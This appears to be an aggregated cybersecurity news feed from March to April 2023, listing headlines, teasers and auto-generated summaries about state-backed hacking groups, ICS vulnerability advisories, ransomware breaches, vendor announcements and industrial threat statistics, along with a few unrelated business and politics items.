      An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 to mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align "

      Autosummary: Drokbk was previously detailed by Secureworks Counter Threat Unit (CTU) in December 2022, attributing it to a threat actor known as Nemesis Kitten (aka Cobalt Mirage, TunnelVision, or UNC2448), a sub-cluster of Mint Sandstorm. "


      New Chameleon Android malware mimics bank, govt, and crypto apps

      financial exploits industry
      2023-04-17 https://www.bleepingcomputer.com/news/security/new-chameleon-android-malware-mimics-bank-govt-and-crypto-apps/
      A new Android trojan called "Chameleon" has been targeting users in Australia and Poland since the start of the year, mimicking the CoinSpot cryptocurrency exchange, an Australian government agency, and the IKO bank. [...] "

      Autosummary: Requesting permission to use the Accessibility Service (Cyble). At first connection with the C2, Chameleon sends the device version, model, root status, country, and precise location, probably to profile the new infection. "


      Snowflake Manufacturing Data Cloud improves supply chain performance

      industry
      2023-04-16 https://www.helpnetsecurity.com/2023/04/16/snowflake-manufacturing-data-cloud/

      Snowflake has launched the Manufacturing Data Cloud, which enables companies in automotive, technology, energy, and industrial sectors to unlock the value of their critical siloed industrial data by leveraging Snowflake’s data platform, Snowflake- and partner-delivered solutions, and industry-specific datasets. The Manufacturing Data Cloud empowers manufacturers to collaborate with partners, suppliers, and customers in a secure and scalable way, driving greater agility and visibility across the entire value chain. With Snowflake’s Manufacturing Data Cloud, organizations can … More

      The post Snowflake Manufacturing Data Cloud improves supply chain performance appeared first on Help Net Security.

      "

      Autosummary: Powering smart manufacturing. Native support for semi-structured, structured, and unstructured high-volume Internet of Things (IoT) data in Snowflake enables manufacturers to keep operations running remotely by streamlining operations within and across manufacturing plants, while also leveraging shop floor data in near real-time to predict maintenance needs, analyze cycle time, improve product yield and quality, and meet sustainability goals. "


      Daon brings IdentityX to healthcare industry

      industry
      2023-04-15 https://www.helpnetsecurity.com/2023/04/15/daon-expanding-identityx/

      Daon is expanding its IdentityX to the healthcare industry to enable organizations to safeguard identities for providers, staff, and patients. As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. Daon IdentityX provides identity proofing and authentication solutions for every touchpoint – patient care, medical … More

      The post Daon brings IdentityX to healthcare industry appeared first on Help Net Security.

      "

      Autosummary: As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. "


      Tactics that make crypto giveaway scams so successful

      financial industry
      2023-04-14 https://www.helpnetsecurity.com/2023/04/14/tactics-crypto-giveaway-scams-video/

      The illicit market for crypto giveaway scams has expanded, offering various services to facilitate fraudulent activity. The proliferation of fake crypto giveaways can be attributed to the increased availability of tools for scammers, even those with limited technical skills. In this Help Net Security video, Tony Lauro, Director of Security Technology and Strategy at Akamai, discusses why crypto giveaway scams are so successful.

      The post Tactics that make crypto giveaway scams so successful appeared first on Help Net Security.

      "

      Autosummary: "


      Votiro collaborates with Sumo Logic to provide analytics on file-borne threats

      industry
      2023-04-14 https://www.helpnetsecurity.com/2023/04/15/votiro-collaborates-with-sumo-logic-to-provide-analytics-on-file-borne-threats/

      Votiro has integrated with Sumo Logic to enable reliable and secure cloud-native applications. Users can now send high-fidelity data and insights discovered by Votiro Cloud into the Sumo Logic Cloud SIEM console. Enterprises are relying on collaboration platforms, cloud workloads and storage environments more than ever before. File sharing and Cloud data usage will continue to expand, providing more opportunities for bad actors to penetrate enterprise networks through file-borne malware. Sumo Logic’s Cloud SIEM automatically … More

      The post Votiro collaborates with Sumo Logic to provide analytics on file-borne threats appeared first on Help Net Security.

      "

      Autosummary: “We are excited to announce this integration with Sumo Logic to arm security teams with an open, API-based solution to detect, disarm and respond to relevant threats,” Srinivasan added. "


      Brazil riots: Jair Bolsonaro ordered to testify by Supreme Court

      latam industry
      2023-04-14 https://www.bbc.co.uk/news/world-latin-america-65282559?at_medium=RSS&at_campaign=KARANGA
      Prosecutors say the ex-president incited riots by questioning the legitimacy of an election. "

      Autosummary: "


      Lazarus Hacker Group Evolves Tactics, Tools, and Targets in DeathNote Campaign

      industry
      2023-04-13 https://thehackernews.com/2023/04/lazarus-hacker-group-evolves-tactics.html
      The North Korean threat actor known as the Lazarus Group has been observed shifting its focus and rapidly evolving its tools and tactics as part of a long-running activity called DeathNote. While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world "

      Autosummary: While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world, in what's perceived as a "significant" pivot. "


      Fortinet fixed a critical vulnerability in its Data Analytics product

      exploits industry
      2023-04-13 https://securityaffairs.com/144750/security/fortinet-critical-vulnerability-data-analytics.html

      Fortinet addressed a critical vulnerability that can lead to remote, unauthenticated access to Redis and MongoDB instances. Fortinet has addressed a critical vulnerability, tracked as CVE-2022-41331 (CVSS score of 9.3), in its Fortinet FortiPresence data analytics solution. FortiPresence is a comprehensive data analytics solution designed for analyzing user traffic and deriving usage patterns. Successful exploitation can […]

      The post Fortinet fixed a critical vulnerability in its Data Analytics product appeared first on Security Affairs.

      "

      Autosummary: "


      SentinelOne announces integration of firewalls and NDR capabilities with key industry players

      industry
      2023-04-13 https://www.helpnetsecurity.com/2023/04/14/sentinelone-ndr-capabilities/

      SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. “The integration of firewalls and NDR capabilities perfectly complements our XDR solutions,” said Akhil Kapoor, VP, Technology Partnerships, SentinelOne. “In … More

      The post SentinelOne announces integration of firewalls and NDR capabilities with key industry players appeared first on Help Net Security.

      "

      Autosummary: SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. "


      DirectDefense and Claroty join forces to secure XIoT environments

      industry
      2023-04-13 https://www.helpnetsecurity.com/2023/04/14/directdefense-claroty/

      DirectDefense has partnered with Claroty which empowers organizations with visibility, protection, and threat detection to secure their Extended Internet of Things (XIoT), a vast network of cyber-physical systems across industrial, healthcare, and commercial environments. As digital transformation efforts have intensified over the last decade, a broad range of XIoT assets – including operational technology (OT), the Internet of Medical Things (IoMT), building management systems (BMS) and enterprise IoT – are now interconnected. While this drives … More

      The post DirectDefense and Claroty join forces to secure XIoT environments appeared first on Help Net Security.

      "

      Autosummary: "


      Elon Musk: Tesla to build new battery factory in Shanghai

      industry
      2023-04-10 https://www.bbc.co.uk/news/business-65228927?at_medium=RSS&at_campaign=KARANGA
      Elon Musk's company says the plant will be able to produce 10,000 "Megapack" battery units a year. "

      Autosummary: "


      Estonian National Charged in U.S. for Acquiring Electronics and Metasploit Pro for Russian Military

      industry rusia-ucrania
      2023-04-10 https://thehackernews.com/2023/04/estonian-national-charged-in-us-for.html
      An Estonian national has been charged in the U.S. for purchasing U.S.-made electronics on behalf of the Russian government and military. The 45-year-old individual, Andrey Shevlyakov, was arrested on March 28, 2023, in Tallinn. He has been indicted with 18 counts of conspiracy and other charges. If found guilty, he faces up to 20 years in prison. Court documents allege that Shevlyakov operated "

      Autosummary: "


      Estonian National charged with helping Russia acquire U.S. hacking tools and electronics

      industry
      2023-04-09 https://securityaffairs.com/144567/cyber-crime/estonian-national-helped-russia-acquire-us-electronics.html

      Andrey Shevlyakov, an Estonian national, was charged in the US with conspiracy and other charges related to acquiring U.S.-made electronics on behalf of the Russian government and military. The Estonian man is accused of having helped the Russian government and military to purchase US-made electronics and hacking tools. The defendant was arrested in Estonia on […]

      The post Estonian National charged with helping Russia acquire U.S. hacking tools and electronics appeared first on Security Affairs.

      "

      Autosummary: "


      CISA Warns of Critical ICS Flaws in Hitachi, mySCADA, ICL, and Nexx Products

      industry
      2023-04-07 https://thehackernews.com/2023/04/cisa-warns-of-critical-ics-flaws-in.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published eight Industrial Control Systems (ICS) advisories warning of critical flaws affecting products from Hitachi Energy, mySCADA Technologies, Industrial Control Links, and Nexx. Topping the list is CVE-2022-3682 (CVSS score: 9.9), impacting Hitachi Energy's MicroSCADA System Data Manager SDM600 that could allow an "

      Autosummary: The following versions of Nexx smart home devices are affected: Nexx Garage Door Controller (NXG-100B, NXG-200), version nxg200v-p3-4-1 and prior; Nexx Smart Plug (NXPG-100W), version nxpg100cv4-0-0 and prior; Nexx Smart Alarm (NXAL-100), version nxal100v-p1-9-1 and prior. "Successful exploitation of these vulnerabilities could allow an attacker to receive sensitive information, execute application programmable interface (API) requests, or hijack devices," CISA said. "


      Industrial Defender launches Phoenix to secure SMBs operations

      industry
      2023-04-06 https://www.helpnetsecurity.com/2023/04/06/industrial-defender-phoenix/

      Industrial Defender has unveiled the launch of Phoenix, an OT security solution tailored to the needs of SMBs. Phoenix is revolutionizing how smaller industrial organizations approach OT security by providing visibility into all their OT assets and their associated cyber risks. By providing a solution that is easy to deploy and cost-effective, Phoenix enables SMBs to overcome resource barriers and secure their operations effectively. “From ransomware campaigns to nation-state attacks, cyber threats against industrial organizations … More

      The post Industrial Defender launches Phoenix to secure SMBs operations appeared first on Help Net Security.

      "

      Autosummary: Suited for environments with up to 200 endpoints, Phoenix provides a quick, automated view of all OT assets and vital endpoint information, including: device type, make, model and serial number; software and firmware; user accounts; ports and services; and configuration details. Phoenix provides a quick on-ramp to asset discovery by monitoring network communication. "


      IoT garage door exploit allows for remote opening attack

      exploits industry
      2023-04-06 https://www.malwarebytes.com/blog/news/2023/04/iot-garage-door-exploit-allows-for-remote-opening-attack

      Categories: News

      Tags: IoT, garage, door, remote, open, app, switch, alarm, Nexx

      Multiple exploits are impacting a line of smart products for the home.

      The post IoT garage door exploit allows for remote opening attack appeared first on Malwarebytes Labs.

      "

      Autosummary: If you have devices and apps being used to power your home, alarms, doors, windows, or anything else, now is the time to check if those passwords are hard coded. From the CISA mitigations page, which doesn’t go quite as far as Sabetan’s advice to remove all of the Nexx products from your home or place of business: Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet. "


      CISA JCDC Will Focus on Energy Sector

      industry
      2023-04-05 https://securityaffairs.com/144466/security/cisa-jddc-energy-sector.html

      The CISA’s Joint Cyber Defense Collective (JCDC) initiative is going to build operation plans for protecting and responding to cyber threats. What comes to mind when you think of cyber criminals? Depending on who you ask, you’ll get a variety of answers. For some, a cyber criminal matches some of the Hollywood tropes: a […]

      The post CISA JCDC Will Focus on Energy Sector appeared first on Security Affairs.

      "

      Autosummary: About the Author: Michael Sanchez, CEO (CISA), has over 35 years of experience in information technology, cybersecurity, physical security, risk, compliance, and audit. "


      Jair Bolsonaro returning to Brazil for first time since 8 January riots

      latam industry
      2023-03-30 https://www.bbc.co.uk/news/world-latin-america-65120313?at_medium=RSS&at_campaign=KARANGA
      The far-right ex-leader has not been home since supporters stormed government buildings in January. "

      Autosummary: "


      The rise of biometrics and decentralized identity is a game-changer for identity verification

      industry
      2023-03-30 https://www.helpnetsecurity.com/2023/03/30/biometrics-decentralized-identity-verification-video/

      The journey towards digital transformation for organizations and governments has been fraught with difficulties, resulting in some users needing to catch up as more digital services are introduced. In this Help Net Security video, Jenn Markey, VP of Payments and Identities at Entrust, talks about how biometrics, hybrid solutions, and decentralized identity are transforming the industry and the future of identity verification. Digital identity is a rapidly evolving space, with the market expected to reach … More

      The post The rise of biometrics and decentralized identity is a game-changer for identity verification appeared first on Help Net Security.

      "

      Autosummary: "


      Cynerio and Sodexo join forces to address growing threats to medical IoT devices

      industry
      2023-03-30 https://www.helpnetsecurity.com/2023/03/31/cynerio-sodexo/

      Cynerio has formed a partnership with Sodexo to provide hospitals and healthcare systems with visibility into their IoMT footprint that allows for the immediate remediation of identified threats through step-by-step mitigation recommendations for each attack and risk. The Cynerio partnership with Sodexo HTM provides healthcare organizations with the threat intelligence they need to compile a precise inventory of all network-connected medical and enterprise IoT devices on the network. This inventory is then evaluated for potential … More

      The post Cynerio and Sodexo join forces to address growing threats to medical IoT devices appeared first on Help Net Security.

      "

      Autosummary: "


      What the food and building industry can teach us about securing embedded systems

      industry
      2023-03-28 https://www.helpnetsecurity.com/2023/03/28/adam-boulton-securing-embedded-systems/

      As one of the leading experts in product security with over 15 years of experience in security engineering and 120 cybersecurity patents under his belt, Adam Boulton is one of the most experienced software security professionals in the industry. Currently the SVP of Security Technology and Innovation at Cybellum, the Left to Our Own Devices podcast invited Adam Boulton to share his experience and his tips on building a product security strategy. Adam didn’t expect … More

      The post What the food and building industry can teach us about securing embedded systems appeared first on Help Net Security.

      "

      Autosummary: For years, he was involved in typical security-critical systems: web applications, mobile applications, source code reviews, without any real exposure to embedded devices. In addition, Adam warns, “There are tons of non-functional requirements, such as hardening requirements that you cannot check because they don’t exist at a source code level.” How product teams can secure a budget in 2023. Adam shared a few practical tips on how product teams can secure a budget in a difficult economy: Understand the business – CEOs aren’t interested in CVEs and CVSS scores, no matter how passionate you are. “For large products, for example, like an infotainment system, a modern one has more than 140,000 files on there, right?” Developing a quality software security strategy – with metrics and KPIs. Calling upon his experience, Adam shared strategies and KPIs that can be used by C-level executives to track and measure the ROI of product security. "


      Bitter APT group targets China’s nuclear energy sector

      industry
      2023-03-28 https://securityaffairs.com/144144/apt/bitter-apt-china-nuclear-sector.html

      Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked it to the Bitter APT group. The Bitter APT group is a South Asian cyberespionage group active since at least 2021. The group […]

      The post Bitter APT group targets China’s nuclear energy sector  appeared first on Security Affairs.

      "

      Autosummary: "


      FBI: Business email compromise tactics used to defraud U.S. vendors

      industry
      2023-03-26 https://www.bleepingcomputer.com/news/security/fbi-business-email-compromise-tactics-used-to-defraud-us-vendors/
      The Federal Bureau of Investigation is warning companies in the U.S. of threat actors using tactics similar to business email compromise that allow less technical actors to steal various goods from vendors. [...] "

      Autosummary: "


      APT attacks on industrial organizations in H2 2022

      industry
      2023-03-24 https://ics-cert.kaspersky.com/publications/apt-attacks-on-industrial-organizations-in-h2-2022/
      This summary provides an overview of APT attacks on industrial enterprises and activity of groups that have been observed attacking industrial organizations and critical infrastructure facilities. "

      Autosummary: According to KSN telemetry, DTrack activity has been detected in Brazil, Germany, India, Italy, Mexico, Saudi Arabia, Switzerland, Turkey, and the United States, indicating that DTrack is being distributed into more parts of the world. CISA alerts on Iran-backed APT actors. CISA (Cybersecurity and Infrastructure Security Agency), the FBI, the NSA (National Security Agency), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), and the Department of the Treasury (Treasury) have released a joint advisory, which warns of APT actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) of Iran targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors. Once access had been acquired, the operators deployed multiple publicly available tools for reconnaissance, including Mimikatz, EarthWorm, ReGeorg, and NBTscan, and then deployed their custom implants: a first-stage loader, followed by a second-stage .NET loader (PNGLoad). POLONIUM’s toolset consists of seven custom backdoors: CreepyDrive, which abuses OneDrive and Dropbox cloud services for C&C; CreepySnail, which executes commands received from the attackers’ own infrastructure; DeepCreep and MegaCreep, which make use of Dropbox and Mega file storage services, respectively; and FlipCreep, TechnoCreep, and PapaCreep, which receive commands from attackers’ servers. The attack targeted over a dozen organizations, including industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan. The targets include organizations in the engineering, IT, law, communications, branding and marketing, media, insurance, and social services sectors. The payloads used include information stealers, keyloggers, PowerSploit scripts, PlugX/Korplug, Trochilus RAT, QuasarRAT, publicly available tools, etc. In its first wave of attacks, the threat actor, which has been dubbed Earth Longzhi, targeted government organizations, infrastructure companies, and healthcare companies in Taiwan, as well as Chinese banks. In the new series of attacks, the attackers used six different backdoors (PortDoor, nccTrojan, Cotx, DNSep, Logtu, and CotSam) at the same time – probably to set up redundant communication channels with infected systems in case one of the malicious programs was removed by an antivirus solution. Cloud Atlas/Inception attacks. Researchers at CheckPoint have observed Cloud Atlas (aka Inception) campaigns focused on very specific targets in Belarus, mainly in the country’s transportation and military radio-electronics sectors, and in Russia, including the government sector, energy and metal industries, since June 2022. Microsoft experts have observed activity targeting employees in organizations across multiple industries, including media, defense and aerospace, and IT services in the USA, UK, India, and Russia. "


      "Bitter" espionage hackers target Chinese nuclear energy orgs

      industry
      2023-03-24 https://www.bleepingcomputer.com/news/security/bitter-espionage-hackers-target-chinese-nuclear-energy-orgs/
      A cyberespionage hacking group tracked as "Bitter APT" was recently seen targeting the Chinese nuclear energy industry using phishing emails to infect devices with malware downloaders. [...] "

      Autosummary: Empty MSI payloads (Intezer) Intezer's analysts could not retrieve any actual payloads delivered in this campaign but hypothesized that they might include keyloggers, RATs (remote access tools), and info-stealers. "


      German and South Korean Agencies Warn of Kimsuky's Expanding Cyber Attack Tactics

      industry
      2023-03-23 https://thehackernews.com/2023/03/german-and-south-korean-agencies-warn.html
      German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS "

      Autosummary: "This threat actor's activities include collecting financial, personal, and client data specifically from academic, manufacturing, and national security industries in South Korea," Google-owned threat intelligence firm Mandiant disclosed last year. "


      CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems

      industry
      2023-03-22 https://thehackernews.com/2023/03/cisa-alerts-on-critical-security.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released eight Industrial Control Systems (ICS) advisories on Tuesday, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics' InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are "

      Autosummary: Another set of vulnerabilities relates to Rockwell Automation's ThinManager ThinServer and affects the following versions of the thin client and remote desktop protocol (RDP) server management software: 6.x – 10.x, 11.0.0 – 11.0.5, 11.1.0 – 11.1.5, 11.2.0 – 11.2.6, 12.0.0 – 12.0.4, 12.1.0 – 12.1.5, and 13.0.0 – 13.0.1. The most severe of the issues are two path traversal flaws tracked as CVE-2023-28755 (CVSS score: 9.8) and CVE-2023-28756 (CVSS score: 7.5) that could permit an unauthenticated remote attacker to upload arbitrary files to the directory where the ThinServer.exe is installed. "


      The revolution underway in India's diamond industry

      industry
      2023-03-17 https://www.bbc.co.uk/news/business-64783843?at_medium=RSS&at_campaign=KARANGA
      India's long history with diamonds enters a new chapter as lab-grown versions of the gem take off. "

      Autosummary: "


      Hitachi Energy confirms data breach after Clop GoAnywhere attacks

      financial industry
      2023-03-17 https://www.bleepingcomputer.com/news/security/hitachi-energy-confirms-data-breach-after-clop-goanywhere-attacks/
      Hitachi Energy confirmed it suffered a data breach after the Clop ransomware gang stole data using a zero-day GoAnywhere vulnerability. [...] "

      Autosummary: "


      Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation

      exploits industry
      2023-03-17 https://securityaffairs.com/143640/data-breach/hitachi-energy-data-breach.html

      Hitachi Energy disclosed a data breach: the Clop ransomware gang stole the company's data by exploiting the recent GoAnywhere zero-day flaw. The company was hacked by the Clop ransomware gang, which stole its data by exploiting the recently disclosed zero-day vulnerability in the GoAnywhere MFT (Managed File Transfer). The […]

      The post Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation appeared first on Security Affairs.

      "

      Autosummary: "


      Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe

      financial industry
      2023-03-17 https://www.welivesecurity.com/videos/banking-turmoil-opportunities-cybercriminals-week-security-tony-anscombe/

      Scammers are looking to cash in on the chaos that has set in following the startling meltdowns of Silicon Valley Bank and Signature Bank and the crisis at Credit Suisse

      The post Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe appeared first on WeLiveSecurity

      "

      Autosummary: "


      What's Wrong with Manufacturing?

      industry
      2023-03-16 https://thehackernews.com/2023/03/whats-wrong-with-manufacturing.html
      In last year's edition of the Security Navigator we noted that the Manufacturing Industry appeared to be totally over-represented in our dataset of Cyber Extortion victims. Neither the number of businesses nor their average revenue particularly stood out to explain this. Manufacturing was also the most represented Industry in our CyberSOC dataset – contributing more Incidents than any other "

      Autosummary: We derived three metrics that facilitate somewhat normalized comparisons across the industries in our client base: VOC scanning findings per asset, time to patch, Pentest findings per day of testing. In a similar comparison, limited only to Perimeter Security, and only Medium Sized business, Manufacturing ranks 1st with the most Incidents per Customer out of 7 comparable Industries. Pentesting findings We observe that the average CVSS Per Day was 4.81, compared to 3.61 on average for clients in all other sectors in the dataset – 33% higher. We note that 58% of the Incidents this industry deals with are internally caused, 32% were externally caused, 1% was classified as "Partner" or 3rd parties. Hunting for possible explanations Manufacturing is still the most impacted industry in our Cyber Extortion dataset in 2023, as tracked by monitoring double-extortion leak sites. "


      Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations

      industry
      2023-03-15 https://www.helpnetsecurity.com/2023/03/15/canonical-mediatek/

      Canonical is partnering with MediaTek to meet the growing demands of the IoT industry, reduce development costs and accelerate time-to-market. By partnering to enable Ubuntu on the Genio platform, MediaTek and Canonical will make it easier for developers, innovators and the embedded community to take advantage of this power-efficient, high-performance IoT SoC. The collaboration ensures developers and enterprises can create reliable and secure devices, benefiting from up to 10 years of enterprise-grade Ubuntu support, security … More

      The post Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations appeared first on Help Net Security.

      "

      Autosummary: Aiming to further the deployment of Arm-based solutions, Ubuntu Core, the secure, application-centric OS optimised for embedded devices, is now available on SystemReady-certified arm64 systems, with the MediaTek Genio 1200 becoming the first platform to enable Ubuntu Core on SystemReady IR. Reliable and efficient over-the-air updates With the modern proliferation of IoT devices, delivering reliable software updates to low-powered, inaccessible, and often remotely administered embedded systems is significantly challenging. "


      YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

      government industry
      2023-03-15 https://thehackernews.com/2023/03/yorotrooper-stealing-credentials-and.html
      A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco "

      Autosummary: "


      H2 2022 – brief overview of main incidents in industrial cybersecurity

      industry ciber
      2023-03-15 https://ics-cert.kaspersky.com/publications/h2-2022-brief-overview-of-main-incidents-in-industrial-cybersecurity/
      In this overview, we discuss cybercriminal and hacktivist attacks on industrial organizations. "

      Autosummary: Hive Ransomware The Cybersecurity and Infrastructure Security Agency (CISA), together with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), published a joint alert about the Hive ransomware group, which targeted a wide range of businesses and infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health. The ALPHV ransomware gang, aka BlackCat, claimed responsibility for the cyberattack against Creos and added it to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. On December 29, the LockBit ransomware gang took responsibility for the attack against the port, claiming to have stolen financial reports, audits, budgets, contracts, ship logs and other information about cargo and crews. The data leaked includes bank account details, dates of birth, next-of-kin information, national insurance numbers and tax information, health and well-being information, disciplinary and grievance related documents, etc. The attackers used known vulnerabilities (CVE-2022-24521, CVE-2020-1472), phishing, PowerShell scripts, KerberCache tool, compromised credentials and RDP to gain access, then used the Hancitor loader to drop their ransomware. From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries. According to the company’s statement, data that was unlawfully accessed potentially included personal information (including names, emails, addresses, taxpayer identification numbers, and banking information of affected individuals and businesses).
U-blox U-blox, a Swiss company that creates wireless semiconductors and modules for consumer, automotive and industrial markets, said on October 28 that it had been targeted by a ransomware attack, which was detected and contained on October 24. Tata Power On October 14, the largest Indian energy company, Tata Power Company Limited, confirmed that it was targeted by a cyberattack, which affected its IT infrastructure. EPM In December, Empresas Públicas de Medellín (EPM), a Colombian energy provider, was hit with a ransomware attack, which disrupted the company’s operations and took down online services. The hackers uploaded a sample of the stolen files, including employment contracts, supplier contracts, files on various employees, documents detailing executive compensation packages, and more. Information stolen by the attackers may have included employee names, addresses, dates of birth, direct deposit information, ethnicity, and Social Security numbers. Elbit Systems Elbit Systems of America, a subsidiary of Israeli defense contractor Elbit Systems, confirmed a data breach, several months after a ransomware gang claimed to have hacked the company’s systems. The RansomEXX ransomware gang took responsibility for the “malicious cyberactivity” and for stealing 29.9GB of files pertaining to non-disclosure agreements, passports, IDs, contracts, and supply agreements. The company didn’t name the attacker, but BleepingComputer, which saw a ransom note on one of Semikron's systems, reported that LV Ransomware might be behind the attack and that they claim to have stolen two terabytes of company data. Eurocell Eurocell, a UK-based PVC-U manufacturer, was hit by a cyberattack, which led to critical personal details of employees being leaked. The main targets of Cuba ransomware attacks are financial services, government, healthcare and public health, critical manufacturing, and information technology. "


      YoroTrooper cyberspies target CIS energy orgs, EU embassies

      industry
      2023-03-14 https://www.bleepingcomputer.com/news/security/yorotrooper-cyberspies-target-cis-energy-orgs-eu-embassies/
      A new threat actor named "YoroTrooper" has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries. [...] "

      Autosummary: Stink can collect credentials, bookmarks, and browsing data from Chrome-based browsers, while it can also snap screenshots and steal data from Filezilla, Discord, and Telegram. "


      Iranian Hackers Target Women Involved in Human Rights and Middle East Politics

      industry
      2023-03-09 https://thehackernews.com/2023/03/iranian-hackers-target-women-involved.html
      Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity "

      Autosummary: "The group undertakes intelligence gathering, often human focused intelligence, like extracting the contents of mailboxes, contact lists, travel plans, relationships, physical location, etc. "


      TSA tells US aviation industry to boost its cybersecurity

      industry ciber
      2023-03-09 https://www.tripwire.com/state-of-security/tsa-tells-us-aviation-industry-boost-its-cybersecurity
      The US Transportation and Security Administration (TSA) has issued new requirements for airport and aircraft operators who, they say, are facing a "persistent cybersecurity threat." Read more in my article on the Tripwire State of Security blog. "

      Autosummary: "


      XIoT risk and the vulnerability landscape

      exploits industry
      2023-03-06 https://www.helpnetsecurity.com/2023/03/06/xiot-risk-video/

      Recently, Claroty released its State of XIoT Security Report, which shares analyses of publicly disclosed vulnerabilities affecting operational technology (OT), internet of things (IoT) devices, and most recently, the internet of medical things (IoMT). In this Help Net Security video, Nadav Erez, VP of Data at Claroty, discusses these findings and the critical need to understand the XIoT risk and vulnerability landscape. Some of the dominant trends include: 73% of vulnerabilities uncovered are critical or … More

      The post XIoT risk and the vulnerability landscape appeared first on Help Net Security.

      "

      Autosummary: "


      Threat landscape for industrial automation systems. Statistics for H2 2022

      industry
      2023-03-06 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h2-2022/
      The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

      Autosummary: 2022 in numbers

      Parameter                                              H1 2022   H2 2022   2022
      Percentage of attacked ICS computers globally          31.8%     34.3%     40.6%
      Main threat sources
        Internet                                             16.5%     19.9%     24.0%
        Email clients                                         7.0%      6.4%      7.9%
        Removable devices                                     3.5%      3.8%      5.2%
        Network folders                                       0.6%      0.6%      0.8%
      Percentage of ICS computers on which malicious objects from different categories were blocked
        Malicious scripts and phishing pages (JS and HTML)   12.9%     13.5%     17.3%
        Denylisted internet resources                         9.5%     10.1%     13.2%
        Spy Trojans, backdoors and keyloggers                 8.6%      7.1%      9.2%
        Malicious documents (MSOffice+PDF)                    5.5%      4.5%      6.2%
        Worms                                                 2.8%      2.5%      3.5%
        Viruses                                               2.4%      2.4%      3.2%
        Miners – executable files for Windows                 2.3%      1.5%      2.7%
        Web miners running in browsers                        1.8%      1.8%      2.5%
        Malware for AutoCAD                                   0.6%      0.6%      0.8%
        Ransomware                                            0.6%      0.4%      0.7%

      Russia, H2 2022 In H2 2022, the most significant change among all countries in the percentage of ICS computers on which malicious objects were blocked was observed in Russia, where that percentage increased by 9 p.p. In H2 2022, the percentage of ICS computers on which malicious scripts and phishing pages were blocked increased: in Belarus, by 10.3 p.p., yielding 17.8% in H2 2022; in Kyrgyzstan, by 16.4 p.p., yielding 26.4% in H2 2022; in Uzbekistan, by 7.8 p.p., yielding 15.6% in H2 2022; in Kazakhstan, by 6.1 p.p., yielding 14.1% in H2 2022. Percentage of ICS computers on which malicious objects were blocked, January – December 2022 In different regions of the world, the percentage of ICS computers on which malicious activity was prevented ranged from 40.1% in Africa and Central Asia, which led the ranking, to 14.2% and 14.3%, respectively, in Western and Northern Europe, which were the most secure regions.
